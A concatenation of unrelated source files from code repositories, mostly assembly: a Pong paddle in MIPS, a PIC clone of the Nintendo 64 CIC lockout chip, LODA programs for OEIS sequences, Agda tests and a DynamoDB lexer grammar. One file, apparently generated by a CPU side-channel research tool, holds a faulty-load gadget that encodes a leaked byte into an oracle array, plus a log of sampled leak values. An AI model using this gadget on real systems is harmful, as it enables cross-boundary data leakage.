$SG2729 call ?DebugPuts@@YAXPAD@Z ; DebugPuts ; 58 : DebugPrintf ("Your cpu vender: %s \n\n", get_cpu_vender ()); call ?get_cpu_vender@@YAPBDXZ ; get_cpu_vender push eax push OFFSET $SG2730 call ?DebugPrintf@@YAHPBDZZ ; DebugPrintf add esp, 60 ; 0000003cH $LL2@main: ; 59 : ; 60 : // Go into a loop--constantly display the current tick count ; 61 : for(;;) { ; 62 : DebugGotoXY (0,14); push 14 ; 0000000eH push 0 call ?DebugGotoXY@@YAXII@Z ; DebugGotoXY ; 63 : DebugPrintf ("Current tick count: %i", get_tick_count()); call ?get_tick_count@@YAHXZ ; get_tick_count push eax push OFFSET $SG2734 call ?DebugPrintf@@YAHPBDZZ ; DebugPrintf add esp, 16 ; 00000010H ; 64 : } jmp SHORT $LL2@main _main ENDP _TEXT ENDS END
PaddleC.asm
DerPferd/PongMIPS
1
175142
<filename>PaddleC.asm # PaddleC.asm # This file implements the Player's Paddle function .globl PaddleC .text # Constructor for the PaddleC Class # # Args: # $a0 The address of the Display # $a1 The a box for the Paddle # # Return: # $v0 The address of the new instance # # Usage: # code to put the address of the Display into $a0 # code to put the address of the Box into $a1 # jal PaddleC # move $t1, $v0 # #################################### # Object Structure # 0-4 The tick function # 4-8 The reset function # 8-12 reserved for later function # 12-16 Display address # 16-20 Box address #################################### PaddleC: move $t0, $a0 # start of new PaddleC() move $t1, $a1 # alloc PaddleC li $v0, 9 # sbrk code li $a0, 28 # number of bytes needed syscall # load methods la $t4, tick la $t5, reset # Setup object sw $t4, 0($v0) sw $t5, 4($v0) sw $t0, 12($v0) sw $t1, 16($v0) # load box into Display sw $t1, 28($t0) jr $ra # Moves the paddle and redraws it # # Args: # $a0 The address of the paddle # $a1 The x of the ball # $a1 The y of the ball # # Return: # none # # Usage: # code to put the address of the paddle into $a0 # li $a1, 0 # the x of the ball # li $a1, 0 # the y of the ball # lw $t9, 0($a0) # jalr $t9 # tick: # $t0 this # $t1 Box # $t2 Display # $t3 x # $t4 y sub $sp, $sp, 4 # allocate stack frame - Start of PaddleC.tick sw $ra, 0($sp) # with return address at 0($sp) move $t0, $a0 lw $t1, 16($t0) lw $t2, 12($t0) move $t3, $a1 move $t4, $a2 # $t6 ylo before move # $t7 yhi before move lw $t6, 4($t1) lw $t7, 12($t1) add $t7, $t7, $t6 # cal good move # $t8 center of paddle sub $t8, $t7, $t6 div $t8, $t8, 2 add $t8, $t8, $t6 sub $t9, $t8, $t4 # $t3 temp var # $t4 x reach # end if out of x reach lw $t4, 12($t2) # mul $t4, $t4, 5 # div $t4, $t4, 4 sub $t3, $t3, $t4 lwc1 $f0, hardness sqrt.s $f0, $f0 lwc1 $f1, 12($t2) cvt.s.w $f1, $f1 mul.s $f0, $f0, $f1 cvt.w.s $f0, $f0 mfc1 $t4, $f0 mul $t4, $t4, -1 blt $t3, $t4, returnTick # move if in y reach # $t4 y reach lw $t3, paddleHeight sub $t3, $t3, 2 div $t3, $t3, 2 mtc1 $t3, $f1 lwc1 $f0, hardness cvt.s.w $f1, $f1 mul.s $f0, $f1, $f0 cvt.w.s $f0, $f0 mfc1 $t4, $f0 bgt $t9, $t4, goUp mul $t4, $t4, -1 bgt $t9, $t4, returnTick li $t8, 2 b goEnd goUp: li $t8, -2 goEnd: # $t8 dy add $t6, $t6, $t8 add $t7, $t7, $t8 # $t5 myhi lw $t5, 16($t2) # if hit edge return without redraw or move bltz $t6, returnTick bgt $t7, $t5, returnTick # Call display.moveboxfast # load args lw $a0, 12($t0) lw $a1, 16($t0) li $a2, 0 move $a3, $t8 lw $t9, 4($a0) jalr $t9 returnTick: lw $ra, 0($sp) # restore return address add $sp, $sp, 4 # and deallocate it jr $ra # Reset the paddle's state back to how it was when it started. # # Args: # $a0 The address of the paddle # # Return: # none # # Usage: # code to put the address of the paddle into $a0 # lw $t9, 4($a0) # jalr $t9 # reset: sub $sp, $sp, 4 # allocate stack frame - Start of PaddleC.reset() sw $ra, 0($sp) # with return address at 0($sp) sub $sp, $sp, 4 sw $a0, 0($sp) # clear the box from the screen # $a0 display # $a1 box lw $a1, 16($a0) lw $a0, 12($a0) lw $t9, 8($a0) jalr $t9 # $a0 paddle # $a1 box lw $a0, 0($sp) lw $a1, 16($a0) add $sp, $sp, 4 # reset pos in box lw $t0, width sub $t0, $t0, 4 lw $t1, height lw $t2, paddleHeight sub $t1, $t1, $t2 div $t1, $t1, 2 sw $t0, 0($a1) sw $t1, 4($a1) lw $ra, 0($sp) # restore return address add $sp, $sp, 4 # and deallocate it jr $ra
UltraCIC.asm
parasyte/UltraCIC
84
87743
processor pic16f1613 ; UltraCIC - Nintendo 64 CIC clone by <NAME> ; This code is released in the public domain ; Pins ; Num Port Function ; 9 C.1 PIF_DATA (bidir) ; 10 C.0 PIF_DCLK include p16f1613.inc ;;;;;;;;;;;;;; ; DEFINES ;;;;;;;;;;;;;; variable region = 0 ; 0 is NTSC, 1 is PAL ; CONFIG1 __CONFIG _CONFIG1, _FOSC_ECM & _PWRTE_OFF & _MCLRE_ON & _CP_OFF & _BOREN_OFF & _CLKOUTEN_ON ; CONFIG2 __CONFIG _CONFIG2, _WRT_OFF & _ZCD_ON & _PLLEN_ON & _STVREN_ON & _BORV_LO & _LPBOR_OFF & _LVP_ON ; CONFIG3 __CONFIG _CONFIG3, _WDTCPS_WDTCPS1F & _WDTE_OFF & _WDTCWS_WDTCWSSW & _WDTCCS_SWC ;;;;;;;;;;;; ; UTILITY ;;;;;;;;;;; ; increment FSR0 ; uses 70 (common RAM) as a temp register ; incf FSR0,F does not set DC on 4-bit overflow incfsr MACRO movwf 70 movlw 1 addwf FSR0,F movf 70,W ENDM ; adc emulation ; uses 70 as carry in adc_nocarry_out MACRO bcf STATUS, DC btfsc 70, 0 ; if carry, add 1 addlw 1 bcf 70, 0 ; clear fake C, will set it again below if necessary btfsc STATUS, DC bsf 70, 0 ; set fake C if there was DC ; after carry-in is accounted for, add mem addwf INDF0, W ENDM ;;;;;;;;;;; ;; ENTRY ;;;;;;;;;; ; initialize ports call init_ports movlw region movwf 72 ; boot sequence movlw 0 call write_bit movf 72, W ; region: 0 for NTSC, 1 for PAL call write_bit movlw 0 call write_bit movlw 1 call write_bit ; load seed and write that call seed_write ; load checksum and write that call checksum_write ;;;;;;;;;;;;;;;;;;;; ; MAIN LOOP ;;;;;;;;;;;;;;;;;; main_runtime: movlw 0xe movwf 20 movlw 0xb movwf 31 call load_pat movlw 21 movwf FSR0 call get_four_bits movlw 31 movwf FSR0 call get_four_bits main_loop: call get_bit btfss STATUS, C goto main_zero ; received a one call get_bit btfss STATUS, C ; 1 then 0, x105 mode goto x105_main ; 1 then 1 bcf STATUS, C goto console_reset ; received a zero main_zero: call get_bit btfss STATUS, C goto main_zero_zero ; 0 then 1, kill yourself goto dead ; 0 then 0 main_zero_zero: movlw 0x20 movwf FSR0 call main_algorithm call main_algorithm call main_algorithm movlw 0x30 movwf FSR0 call main_algorithm call main_algorithm call main_algorithm ; W = RAM[17] ; if W < F ; ++W ; [trust me on this] movf 37, W addlw 0xF btfss STATUS, DC movlw 0 addlw 1 ; BL = A ; such a hack bcf FSR0, 0 bcf FSR0, 1 bcf FSR0, 2 bcf FSR0, 3 andlw 0xF iorwf FSR0, F getabit: clrf 70 ; storing carry here call get_bit btfsc STATUS, C bsf 70, 0 ; save the bit ;-------- ; write lowest bit of RAM ; address is BM = 1, BL starts at RAM[17] ; BM = 1 movlw 30 iorwf FSR0, F ; W = lowest bit of current RAM movlw 1 btfss INDF0, 0 movlw 0 call write_bit ; /writing lowest bit of ram ;-------- movlw 2F andwf FSR0, F ; if bit from PIF was 0, if RAM is 1 then kill yourself btfss 70, 0 goto pif_said_zero ; if bit from PIF was 1, if RAM is 0 then kill yourself btfss INDF0, 0 goto dead goto more_bits pif_said_zero: ; if PIF said 0 and we have 1, kill self (see above) btfss INDF0, 0 goto more_bits goto dead more_bits: movlw 1 ; jump down to PAL if region is 1 btfsc 72, 0 goto mb_pal ; NTSC addwf FSR0, F btfss STATUS, DC goto getabit goto main_loop mb_pal: ; PAL subwf FSR0, F movlw 0xF andwf FSR0, W btfss STATUS, Z goto getabit goto main_loop ; end of function ;;;;;;;;;;;;;;;;; ;; x105 algorithm ;;;;;;;;;;;;;;;;; x105_main: ; write A A movlw 0xa movwf 40 movlw 40 movwf FSR0 call write_nibble call write_nibble ; load 40 .. 5D keep_loading: call get_four_bits incf FSR0,F call get_four_bits incf FSR0,F movlw 5E subwf FSR0,W btfss STATUS, Z goto keep_loading ; magic happens here call x105_algo movlw 0 call write_bit ; write out RAM movlw 40 movwf FSR0 x105_write_nibbles: call write_nibble incf FSR0, F movlw 5e subwf FSR0, W btfss STATUS, Z goto x105_write_nibbles goto main_loop exc MACRO xorwf INDF0, W xorwf INDF0, F xorwf INDF0, W ENDM ; x105 core algorithm x105_algo: movlw 0x40 movwf FSR0 ; using lowest bit of 70 as C stand-in clrf 70 bsf 70, 0 movlw 0x5 x105_loop: btfss INDF0, 0 addlw 8 exc btfss INDF0, 1 addlw 4 addwf INDF0, W movwf INDF0 btfss 70, 0 addlw 7 addwf INDF0, W ; adc emulation is gross adc_no_carry_out btfsc STATUS, DC bsf 70, 0 ; set fake C if there was DC movwf INDF0 comf INDF0, F movlw 5D subwf FSR0, W btfsc STATUS, Z goto done movf INDF0, W incf FSR0, F goto x105_loop done: return ; 0 1 mode console_reset: ; delay a bit movlw 0 movwf 70 dloop: clrwdt incf 70 btfss STATUS, Z goto dloop addlw 1 btfss STATUS, Z goto dloop ; let the PIF know we're done delaying movlw 0 call write_bit goto main_loop ;;;;;;;;;;;;;;;;;; ;; main algorithm ;;;;;;;;;;;;;;;;;; cic_round: clrwdt ; 70 is fake carry, 71 is temporary storage clrf 70 movlw 0xf iorwf FSR0, F movf INDF0, W outer_loop: movwf 71 ; 71 is "X" bsf 70, 0 ; jump back to RAM[1] movlw 0xf1 andwf FSR0, F ; get back saved W movf 71, W ; adc emulation adc_nocarry_out bsf 70, 0 ; set carry movwf INDF0 incf FSR0, F ; adc emulation again adc_nocarry_out bsf 70, 0 ; set carry exc comf INDF0, F incf FSR0, F adc_nocarry_out btfsc STATUS, DC bsf 70, 0 ; set fake C if there was DC btfsc 70, 0 ; need to skip if there was carry goto nostore exc incf FSR0, F nostore: addwf INDF0, W movwf INDF0 incf FSR0, F addwf INDF0, W exc incf FSR0, F addlw 8 btfss STATUS, DC addwf INDF0, W exc incf FSR0, F inner_loop: addlw 1 addwf INDF0, F ; test for overflow movlw 1 addwf FSR0, W btfsc STATUS, DC goto break_loop movf INDF0, W incf FSR0, F goto inner_loop break_loop: movf 71, W addlw 0xF btfsc STATUS, DC ; inverted logic goto outer_loop return ;;;;;;;;;;;;;;;;;;;;; ;; seed and checksum ;;;;;;;;;;;;;;;;;;;;; seed_write: call load_seed ; preload b5 then mishmash twice movlw 0xb movwf 2a movlw 5 movwf 2b call mashup movlw 2a movwf FSR0 _loop_nibbles: call write_nibble incfsr btfss STATUS, DC goto _loop_nibbles return load_seed: movlw 0xFF ; FIXME - use a real seed movwf 2c movf 2c, W movwf 2d movwf 2e movwf 2f lsrf 2c, f lsrf 2c, f lsrf 2c, f lsrf 2c, f lsrf 2e, f lsrf 2e, f lsrf 2e, f lsrf 2e, f return checksum_write: call load_checksum _checksum_wait_low: btfsc PORTC, 0 goto _checksum_wait_low movlw 0xd movwf 21 ; encode the checksum by running mishmash four times movlw 20 movwf FSR0 call mishmash movlw 20 movwf FSR0 call mishmash movlw 20 movwf FSR0 call mishmash movlw 20 movwf FSR0 call mishmash ; lower CIC_OUT to indicate we're done movlw 0 call write_bit movlw 20 movwf FSR0 _cw_dump_ram call write_nibble incfsr btfss STATUS, DC goto _cw_dump_ram return ; checksum byte cb MACRO byte movlw byte movwf INDF0 incf FSR0, 1 ENDM ; checksum checksum MACRO va, vb, vc, vd, ve, vf, vg, vh, vi, vj, vk, vl kb va kb vb kb vc kb vd kb ve kb vf kb vg kb vh kb vi kb vj kb vk kb vl ENDM load_checksum: movlw 24 movwf FSR0 ; FIXME - replace this with a real checksum checksum 0x0, 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7, 0x8, 0x9, 0xa, 0xb return ;;;;;;;;;;;;; ; ENCRAPTION ;;;;;;;;;;;;; mashup: ; load 0xa into indirect reg pointer movlw 2a movwf FSR0 call mishmash movlw 2a movwf FSR0 call mishmash return mishmash: ; operates on indf until it hits 0x20 or 0x30 movf INDF0, 0 incf FSR0, 1 mishmash_loop: addlw 1 addwf INDF0, 0 ; A += M movwf INDF0 ; increment FSR0 ; DC is set if its lower 4 bits overflow incfsr ; skip if bottom four bits overflow btfss STATUS, DC goto mishmash_loop return ;;;;;;;;;;;; ;; Load RAM ;;;;;;;;;;;; pat MACRO addr, nibble movlw nibble movwf addr ENDM pat_nibbles MACRO a32, a22, a33, a23, a34, a24, a35, a25, a36, a26, a37, a27, a38, a28, a39, a29, a3A, a2A, a3B, a2B, a3C, a2C, a3D, a2D, a3E, a2E, a3F, a2F pat 0x22, a22 pat 0x32, a32 pat 0x23, a23 pat 0x33, a33 pat 0x24, a24 pat 0x34, a34 pat 0x25, a25 pat 0x35, a35 pat 0x26, a26 pat 0x36, a36 pat 0x27, a27 pat 0x37, a37 pat 0x28, a28 pat 0x38, a38 pat 0x29, a29 pat 0x39, a39 pat 0x2A, a2A pat 0x3A, a3A pat 0x2B, a2B pat 0x3B, a3B pat 0x2C, a2C pat 0x3C, a3C pat 0x2D, a2D pat 0x3D, a3D pat 0x2E, a2E pat 0x3E, a3E pat 0x2F, a2F pat 0x3F, a3F ENDM load_pat: ; jump down to PAL if region is 1 btfsc 72, 0 goto lp_pal ; NTSC pat_nibbles 0x1, 0x9, 0x4, 0xA, 0xF, 0x1, 0x8, 0x8, 0xB, 0x5, 0x5, 0xA, 0x7, 0x1, 0xC, 0x3, 0xD, 0xE, 0x6, 0x1, 0x1, 0x0, 0xE, 0xD, 0x9, 0xE, 0x8, 0xC return lp_pal: ; PAL pat_nibbles 0x1, 0x4, 0x2, 0xF, 0x3, 0x5, 0xF, 0x1, 0x8, 0x2, 0x2, 0x1, 0x7, 0x7, 0x1, 0x1, 0x9, 0x9, 0x8, 0x8, 0x1, 0x5, 0x1, 0x7, 0x5, 0x5, 0xC, 0xA return ; when CIC is instructed to halt: infinite loop dead: nop goto dead ;;;;;;;;;;;;;;;;;;;;; ; I/O ;;;;;;;;;;;;;;;;;;;;; ; wait for PIF to go low write a bit, then wait for it to go high write_bit: banksel PORTC _wait_low: clrwdt btfsc PORTC, 0 goto _wait_low ; write out W to port 1 iorlw 0 ; test if W is 0 btfss STATUS, Z goto _wait_high ; zero: drive zero _zero: bcf PORTC, 1 banksel TRISC bcf TRISC, 1 ; set port 1 to output banksel PORTC _wait_high: clrwdt btfss PORTC, 0 goto _wait_high nop nop nop nop banksel TRISC bsf TRISC, 1 banksel PORTC return ; wait for PIF_DCLK (C.0) to go low ; gets one bit of input on PIF_DATA ; wait for PIF_DCLK to go high again get_bit: bsf STATUS, C ; ensure port 1 is an input banksel TRISC bsf TRISC, 1 bsf TRISC, 0 banksel PORTC ; test bit 0 gb_wait_low: clrwdt btfsc PORTC, 0 goto gb_wait_low ; get input btfss PORTC, 1 bcf STATUS, C gb_wait_high: clrwdt btfss PORTC, 0 goto gb_wait_high return ; get four bits of input from the PIF ; clear bits of RAM depending on if these bits are set get_four_bits: movlw 0xF movwf INDF0 call get_bit btfss STATUS, C bcf INDF0, 3 call get_bit btfss STATUS, C bcf INDF0, 2 call get_bit btfss STATUS, C bcf INDF0, 1 call get_bit btfss STATUS, C bcf INDF0, 0 return ; write a nibble pointed to by INDF0 write_nibble: movlw 1 btfss INDF0, 3 movlw 0 call write_bit movlw 1 btfss INDF0, 2 movlw 0 call write_bit movlw 1 btfss INDF0, 1 movlw 0 call write_bit movlw 1 btfss INDF0, 0 movlw 0 call write_bit return ; time how long it takes the input to go low ; store the result in RAM 0 1 2 ; ; This is normally used as a "random seed", for the mishmash function. The PIF ; doesn't seem to care if the seed value is the same every time, so punt. wait_low_time: btfsc PORTC, 0 goto wait_low_time return init_ports: ; always input: ; - A.* ; - C.0 ; ; open drain: ; - C.1 ; why the FUCK do these default as analog? banksel ANSELA clrf ANSELA clrf ANSELC banksel TRISA movlw b'1111' movwf TRISA movwf TRISC banksel PORTA clrf PORTA clrf PORTC return end
oeis/096/A096365.asm
neoneye/loda-programs
11
240622
<reponame>neoneye/loda-programs<gh_stars>10-100 ; A096365: Maximum number of iterations of the RUNS transform needed to reduce any binary sequence of length n to a sequence of length 1. ; 0,2,3,4,5,5,6,6,6,7,7,7,7,8,8,8,8,8,8,8,9 pow $0,2 mov $1,$0 add $0,5 mov $3,$1 mov $1,$0 mul $3,2 mul $3,$0 mul $1,$3 lpb $1 div $1,10 add $2,16 lpe mov $0,$2 div $0,16
programs/oeis/017/A017402.asm
neoneye/loda
22
21426
; A017402: (11n+1)^2. ; 1,144,529,1156,2025,3136,4489,6084,7921,10000,12321,14884,17689,20736,24025,27556,31329,35344,39601,44100,48841,53824,59049,64516,70225,76176,82369,88804,95481,102400 mul $0,11 add $0,1 pow $0,2
test/interaction/Issue3295.agda
shlevy/agda
1,989
1317
<filename>test/interaction/Issue3295.agda module Issue3295 where open import Issue3295.Incomplete open import Issue3295.Incomplete2 open import Agda.Builtin.Nat open import Agda.Builtin.Equality _ : f 0 ≡ 0 _ = {!!} _ : g 0 ≡ 0 _ = {!!} _ : f 1 ≡ 1 -- the evaluation of `f` should be blocked here _ = {!!} -- so looking at the normalised type should not cause any issue _ : g 1 ≡ 1 -- the evaluation of `g` should be blocked here _ = {!!} -- so looking at the normalised type should not cause any issue
test/succeed/Issue411.agda
asr/agda-kanso
1
14948
<reponame>asr/agda-kanso<filename>test/succeed/Issue411.agda -- Andreas, 2011-04-26 {-# OPTIONS --universe-polymorphism #-} module Issue411 where import Common.Irrelevance record A : Set₁ where field .foo : Set -- this yielded a panic "-1 not a valid deBruijn index" due to old code for assignS
Transynther/x86/_processed/AVXALIGN/_ht_zr_un_/i3-7100_9_0x84_notsx.log_21829_1654.asm
ljhsiun2/medusa
9
20259
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r13 push %r8 push %r9 push %rcx push %rdi push %rsi lea addresses_normal_ht+0xfa08, %r13 nop nop inc %rdi movl $0x61626364, (%r13) nop nop nop nop nop add $21387, %rcx lea addresses_D_ht+0xe608, %r9 nop sub $51368, %r10 movl $0x61626364, (%r9) nop nop nop nop and %r9, %r9 lea addresses_UC_ht+0x8c08, %rsi lea addresses_UC_ht+0x11588, %rdi nop nop nop cmp %r13, %r13 mov $7, %rcx rep movsb nop nop nop nop nop sub %r11, %r11 lea addresses_WC_ht+0x5a08, %rdi nop nop nop nop sub $48831, %rsi movb (%rdi), %r11b nop nop nop xor %r9, %r9 lea addresses_normal_ht+0x18168, %rsi lea addresses_UC_ht+0x6f38, %rdi nop nop nop xor %r8, %r8 mov $62, %rcx rep movsb nop nop nop nop nop and %rcx, %rcx lea addresses_WT_ht+0x178d4, %r11 clflush (%r11) nop nop nop nop nop sub $10553, %r9 movb (%r11), %cl nop nop nop cmp $48555, %rdi lea addresses_UC_ht+0xc7df, %r9 nop dec %rdi mov (%r9), %rsi nop nop nop nop nop xor %rcx, %rcx lea addresses_WC_ht+0x108f4, %rsi lea addresses_normal_ht+0xe46, %rdi clflush (%rsi) cmp $44935, %r10 mov $65, %rcx rep movsl nop nop nop nop nop cmp $9445, %r11 lea addresses_UC_ht+0x13208, %rsi lea addresses_WC_ht+0x14744, %rdi nop nop nop nop nop sub $19574, %r8 mov $14, %rcx rep movsw nop nop nop nop sub %r9, %r9 lea addresses_UC_ht+0x1bbc4, %r9 nop nop nop and %r8, %r8 movl $0x61626364, (%r9) nop and %r13, %r13 lea addresses_normal_ht+0x1e108, %rsi lea addresses_UC_ht+0x6e08, %rdi nop nop nop add $10781, %r11 mov $42, %rcx rep movsq nop dec %r13 pop %rsi pop %rdi pop %rcx pop %r9 pop %r8 pop %r13 pop %r11 pop %r10 ret .global s_faulty_load s_faulty_load: push %r11 push %r15 push %r8 push %rbp push %rbx push %rcx push %rsi // Store lea addresses_WC+0x16208, %rsi nop nop xor $19560, %r11 movw $0x5152, (%rsi) and %r8, %r8 // Store lea addresses_RW+0x13a08, %rbx and $9351, %rbp movl $0x51525354, (%rbx) inc %rbx // Load lea addresses_WC+0x13760, %rbx xor %r15, %r15 mov (%rbx), %bp nop nop nop nop nop add $40032, %rbx // Faulty Load lea addresses_WC+0x11208, %rbp nop nop nop sub %r8, %r8 vmovaps (%rbp), %ymm5 vextracti128 $1, %ymm5, %xmm5 vpextrq $1, %xmm5, %r15 lea oracles, %rsi and $0xff, %r15 shlq $12, %r15 mov (%rsi,%r15,1), %r15 pop %rsi pop %rcx pop %rbx pop %rbp pop %r8 pop %r15 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_WC', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_WC', 'same': False, 'size': 2, 'congruent': 11, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_RW', 'same': False, 'size': 4, 'congruent': 11, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_WC', 'same': False, 'size': 2, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} [Faulty Load] {'src': {'type': 'addresses_WC', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'} <gen_prepare_buffer> {'dst': {'type': 'addresses_normal_ht', 'same': False, 'size': 4, 'congruent': 11, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 4, 'congruent': 8, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_UC_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 2, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 1, 'congruent': 10, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_normal_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_WT_ht', 'same': False, 'size': 1, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 8, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WC_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_UC_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM'} {'dst': {'type': 'addresses_UC_ht', 'same': False, 'size': 4, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_normal_ht', 'congruent': 6, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'} {'47': 1, '44': 2413, '74': 1, '07': 23, '73': 1, '08': 22, '60': 18, '48': 55, '7d': 1, '02': 1, '75': 1, '00': 19290, 'ff': 2} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 44 44 00 00 00 44 00 44 00 00 07 00 00 00 00 00 00 00 44 44 44 00 00 00 00 00 00 00 00 00 44 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 00 00 00 00 00 44 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 44 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 44 44 00 44 00 00 00 00 00 44 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 44 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 44 44 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 44 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 44 00 00 44 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 44 00 00 00 00 00 00 44 00 44 00 00 00 00 00 44 00 00 00 44 00 00 00 00 00 00 00 00 44 00 00 00 00 00 44 00 00 00 44 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 44 00 44 00 44 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 00 00 00 44 00 00 00 00 00 44 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 44 00 44 00 00 00 00 00 44 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 44 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
src/memdisk/memdisk.asm
anna328p/IncludeOS
3,673
247517
<gh_stars>1000+ USE32 ALIGN 4096 section .diskdata incbin "testdisk"
src/Tokens.g4
rchl/amazon-dax-client
0
1186
/* * Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not * use this file except in compliance with the License. A copy of the License * is located at * * http://aws.amazon.com/apache2.0/ * * or in the "license" file accompanying this file. This file is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ /** * Tokens for DynamoDB Grammar */ lexer grammar Tokens; /* Whitespace */ WS : [ \t\n\r]+ -> channel(HIDDEN) ; /* Operators */ EQ : '=' ; NE : '<>' ; LT : '<' ; LE : '<=' ; GT : '>' ; GE : '>=' ; PLUS : '+' ; MINUS : '-' ; /* Keywords */ IN : I N ; BETWEEN : B E T W E E N ; NOT : N O T ; AND : A N D ; OR : O R ; SET : S E T ; ADD : A D D ; DELETE : D E L E T E ; REMOVE : R E M O V E ; /* Index */ INDEX : '0' | POS_DIGIT (DIGIT)* ; /* Identifiers */ ID : ID_START_CHAR (ID_CHAR)* ; // SYSTEM_ID : '_' (ID_CHAR)+ ; /* Substitutions */ ATTRIBUTE_NAME_SUB : '#' (ID_CHAR)+ ; LITERAL_SUB : ':' (ID_CHAR)+; /** * Fragments to help parse tokens */ fragment ID_START_CHAR : [a-zA-Z] ; fragment ID_CHAR : [a-zA-Z_0-9] ; fragment POS_DIGIT : [1-9] ; fragment DIGIT : [0-9] ; fragment A : [aA]; fragment B : [bB]; fragment C : [cC]; fragment D : [dD]; fragment E : [eE]; fragment F : [fF]; fragment G : [gG]; fragment H : [hH]; fragment I : [iI]; fragment J : [jJ]; fragment K : [kK]; fragment L : [lL]; fragment M : [mM]; fragment N : [nN]; fragment O : [oO]; fragment P : [pP]; fragment Q : [qQ]; fragment R : [rR]; fragment S : [sS]; fragment T : [tT]; fragment U : [uU]; fragment V : [vV]; fragment W : [wW]; fragment X : [xX]; fragment Y : [yY]; fragment Z : [zZ]; /* 